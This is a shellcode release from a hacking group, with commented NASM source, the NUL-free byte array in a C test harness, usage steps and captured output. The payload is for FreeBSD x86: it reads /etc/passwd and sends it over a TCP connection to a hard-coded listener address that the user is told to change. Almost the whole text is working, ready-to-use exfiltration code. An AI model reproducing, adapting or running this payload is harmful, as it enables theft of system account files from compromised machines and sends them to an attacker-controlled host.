***(C)oDed bY suN8Hclf***
DaRk-CodeRs Group production, kid
[FreeBSD x86 connect back.send.exit /etc/passwd 112 bytes] (111 opcode bytes, no NUL bytes; the 112 includes the terminating NUL of the C string)
This is the FreeBSD version of 0in's shellcode (http://milw0rm.com/shellcode/6263)
(really learnt a lot while coding this one ;])
Compile (save the code.asm listing below as shellcode.asm; it is 32-bit code, so on an amd64 host ld must be told to produce a 32-bit i386 executable):
nasm -f elf shellcode.asm
ld -e _start -o shellcode shellcode.o
================================================================================
How it works:
1st terminal (on 192.168.1.33, the listener address hard-coded in the payload): $ nc -l 8000
2nd terminal: $ ./shellcode
1st terminal then receives the contents of /etc/passwd over the connection:
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
[..]
================================================================================
Code:
-------------------------code.asm---------------------
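; FreeBSD/i386 connect-back "send a file" payload.
; Syntax: NASM (Intel).  Target: 32-bit FreeBSD, int 0x80 syscall ABI.
; FreeBSD i386 syscall convention as used here: arguments are pushed
; right-to-left, then one extra dword (the slot a libc wrapper's CALL would
; have filled with a return address) is pushed, eax holds the syscall
; number and int 0x80 is executed.  The result comes back in eax.
;
; Flow: open("/etc/passwd") -> read() onto the stack -> close() ->
;       socket() -> connect(192.168.1.33:8000) -> write() -> exit(1).
;
; Register roles across the whole payload:
;   ebx = file descriptor of the opened file
;   esi = start of the read buffer (on the stack)
;   ebp = byte count returned by read()
;   edx = socket descriptor
;
; The assembled bytes are identical to the original listing (the C array
; in code.c depends on that); only named constants and comments were added.
;
; Caveats a user should know before relying on this:
;   * No syscall result is checked.  If open()/read() fail, ebp holds -1
;     and write() is asked to send 0xffffffff bytes; a failed socket() or
;     connect() is likewise ignored.  Checks would cost bytes and were
;     deliberately left out.
;   * read() writes up to READ_LEN bytes UPWARD from the esp of that
;     moment, over the pushed arguments, the path string and the process's
;     initial stack (argv/envp).  Nothing below esp is touched, so the later
;     pushes are safe, but a file larger than what is mapped above the
;     initial stack would fault -- the 3333-byte cap is a guess, not a
;     guarantee, and only the first READ_LEN bytes of the file are sent.

bits 32

; syscall numbers: see /usr/src/sys/kern/syscalls.master on the target
SYS_exit        equ 1
SYS_read        equ 3
SYS_write       equ 4
SYS_open        equ 5
SYS_close       equ 6
SYS_socket      equ 97
SYS_connect     equ 98

O_RDONLY        equ 0
AF_INET         equ 2
SOCK_STREAM     equ 1
SOCKADDR_IN_LEN equ 16
READ_LEN        equ 3333                ; bytes of the file to send ("probably enough")

section .text
global _start
_start:
        xor     eax, eax
        ; Build "/etc/passwd\0" on the stack: the last fragment is pushed
        ; first.  `push byte` stores a full dword, so 0x00000064 gives
        ; "d\0\0\0" and terminates the string.
        push    byte 0x64               ; "d\0\0\0"
        push    word 0x7773             ; "sw"
        push    0x7361702f              ; "/pas"
        push    0x6374652f              ; "/etc"   (file to open)
        mov     ebx, esp                ; ebx = path
        push    eax                     ; flags = O_RDONLY (eax is 0)
        push    ebx                     ; path
        mov     al, SYS_open
        push    eax                     ; dummy return-address slot
        int     0x80                    ; eax = open(path, O_RDONLY)
        mov     ebx, eax                ; ebx = fd (-1 on error, unchecked)
        xor     eax, eax                ; eax is not reliably 0 after int 0x80
        xor     ecx, ecx
        mov     cx, READ_LEN
        push    ecx                     ; nbytes
        mov     esi, esp                ; esi = buffer: the stack itself,
                                        ; filled upward from this address
        push    esi                     ; buf
        push    ebx                     ; fd
        mov     al, SYS_read
        push    eax                     ; dummy slot
        int     0x80                    ; eax = read(fd, esi, READ_LEN)
        mov     ebp, eax                ; ebp = bytes read (or -1, unchecked)
        xor     eax, eax
        mov     al, SYS_close
        push    ebx                     ; fd
        push    eax                     ; dummy slot
        int     0x80                    ; close(fd)
        xor     eax, eax
        push    eax                     ; protocol = 0
        push    byte SOCK_STREAM
        push    byte AF_INET
        mov     al, SYS_socket
        push    eax                     ; dummy slot
        int     0x80                    ; eax = socket(AF_INET, SOCK_STREAM, 0)
        mov     edx, eax                ; edx = sockfd
        ; struct sockaddr_in built on the stack (low address first):
        ;   sin_len = 0xaa (filler chosen to avoid a NUL byte),
        ;   sin_family = AF_INET, sin_port = 0x1f40 = 8000 (network order),
        ;   sin_addr = 192.168.1.33.  sin_zero[8] is not written and the
        ;   namelen argument still says 16.  This relies on the kernel not
        ;   trusting the 0xaa sin_len -- confirm on the target release if
        ;   connect() fails.
        push    0x2101a8c0              ; 192.168.1.33 -- CHANGE to the listener
        push    0x401f02AA              ; port 8000, AF_INET, sin_len filler
        mov     eax, esp                ; eax = &sockaddr_in
        push    byte SOCKADDR_IN_LEN    ; namelen
        push    eax                     ; name
        push    edx                     ; sockfd
        xor     eax, eax
        mov     al, SYS_connect
        push    eax                     ; dummy slot
        int     0x80                    ; connect(sockfd, &sin, 16) -- unchecked
        xor     eax, eax
        push    ebp                     ; nbytes = result of read()
        push    esi                     ; buf = file contents on the stack
        push    edx                     ; sockfd
        mov     al, SYS_write
        push    eax                     ; dummy slot
        int     0x80                    ; write(sockfd, buf, nbytes)
        xor     eax, eax
        inc     eax                     ; eax = SYS_exit (1)
        push    eax                     ; status = 1
        push    eax                     ; dummy slot
        int     0x80                    ; exit(1) -- never returns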
-------------------------code.asm---------------------
C Code (test harness that jumps into the assembled bytes):
-------------------------code.c-----------------------
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>
/*
 * The payload from code.asm, byte for byte: 111 opcode bytes (sizeof is
 * 112 because of the string terminator) and no 0x00 byte anywhere.
 * The two 5-byte lines are the only ones a user needs to edit: they are
 * the pushes that build the sockaddr_in (listener address and port).
 */
char shellcode[]=
"\x31\xc0\x6a\x64\x66\x68\x73\x77\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63" /* xor eax,eax; build "/etc/passwd\0" on the stack */
"\x89\xe3\x50\x53\xb0\x05\x50\xcd\x80\x89\xc3\x31\xc0\x31\xc9\x66\xb9\x05" /* open(path,0) -> ebx; mov cx,3333 starts here ... */
"\x0d\x51\x89\xe6\x56\x53\xb0\x03\x50\xcd\x80\x89\xc5\x31\xc0\xb0\x06\x53" /* ... read(fd, stack, 3333) -> ebp; close(fd) */
"\x50\xcd\x80\x31\xc0\x50\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2" /* socket(AF_INET, SOCK_STREAM, 0) -> edx */
"\x68\xc0\xa8\x01\x21" //<- host address: push 0x2101a8c0 = sin_addr 192.168.1.33, change to the listener
"\x68\xaa\x02\x1f\x40" // <- port number: push 0x401f02aa = sin_len 0xaa (filler), AF_INET, sin_port 0x1f40 = 8000
"\x89\xe0\x6a\x10\x50\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc0\x55\x56\x52" /* connect(sockfd, &sin, 16); push write() args */
"\xb0\x04\x50\xcd\x80\x31\xc0\x40\x50\x50\xcd\x80"; /* write(sockfd, buf, nbytes); exit(1) */
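/*
 * Test harness: makes the page(s) holding `shellcode` executable and
 * jumps into it.  The payload never returns (it ends in exit(1)), so the
 * final return is reached only if the jump itself fails.
 *
 * Why mprotect(): `shellcode` is a writable global and lives in .data.
 * On systems that enforce non-executable data pages a jump into it faults
 * before the first instruction runs; marking the span RWX here avoids
 * having to relink with an executable data section.  argc/argv are unused.
 *
 * Returns 0 (unreachable in practice) or 1 if mprotect() failed.
 */
int main(int argc, char **argv) {
    int (*func)();
    long page = sysconf(_SC_PAGESIZE);
    uintptr_t start, end;

    (void)argc;
    (void)argv;
    if (page <= 0)
        page = 4096;                    /* fallback; must stay a power of two */
    /* round the array's span out to whole pages for mprotect() */
    start = (uintptr_t)shellcode & ~((uintptr_t)page - 1);
    end   = ((uintptr_t)shellcode + sizeof(shellcode) + (uintptr_t)page - 1)
            & ~((uintptr_t)page - 1);
    if (mprotect((void *)start, (size_t)(end - start),
                 PROT_READ | PROT_WRITE | PROT_EXEC) != 0) {
        perror("mprotect");
        return 1;
    }
    func = (int (*)())shellcode;
    (*func)();                          /* does not return */
    return 0;
}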
-------------------------code.c-----------------------
Greetz to: 0in, cOndemned, e.wiZz!, str0ke, doctor
Visit us : www.dark-coders.pl